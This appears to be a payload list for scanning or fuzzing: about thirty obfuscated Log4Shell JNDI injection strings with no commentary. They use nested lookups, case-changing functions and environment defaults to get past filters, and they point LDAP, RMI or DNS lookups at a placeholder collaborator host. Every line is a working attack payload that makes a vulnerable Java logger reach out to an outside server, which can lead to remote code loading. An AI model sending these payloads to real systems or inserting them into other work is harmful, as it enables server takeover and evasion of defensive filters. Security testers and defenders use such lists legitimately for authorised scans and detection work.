${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{COLLABORATOR-HERE}}
${${::-j}ndi:rmi://{{COLLABORATOR-HERE}}
${jndi:rmi://{{COLLABORATOR-HERE}}
${jndi:rmi://{{COLLABORATOR-HERE}}}/
${${lower:jndi}:${lower:rmi}://{{COLLABORATOR-HERE}}
${${lower:${lower:jndi}}:${lower:rmi}://{{COLLABORATOR-HERE}}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{COLLABORATOR-HERE}}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{COLLABORATOR-HERE}}
${jndi:dns://{{COLLABORATOR-HERE}}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://{{COLLABORATOR-HERE}}
${jndi:dns://{{COLLABORATOR-HERE}}}
${j${k8s:k5:-ND}i:ldap://{{COLLABORATOR-HERE}}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//{{COLLABORATOR-HERE}}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://{{COLLABORATOR-HERE}}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//{{COLLABORATOR-HERE}}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://{{COLLABORATOR-HERE}}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//{{COLLABORATOR-HERE}}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//{{COLLABORATOR-HERE}}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//{{COLLABORATOR-HERE}}/{{random}}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//{{COLLABORATOR-HERE}}
${jndi:${lower:l}${lower:d}a${lower:p}://{{COLLABORATOR-HERE}}}
${jnd${upper:i}:ldap://{{COLLABORATOR-HERE}}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://{{COLLABORATOR-HERE}}/{{random}}}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://COLLABORATOR-HERE/a}
${${lower:jndi}:${lower:rmi}://COLLABORATOR-HERE/poc}
${j${loWer:Nd}i${uPper::}://COLLABORATOR-HERE/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}COLLABORATOR-HERE/rce}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//COLLABORATOR-HERE/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//COLLABORATOR-HERE/a}
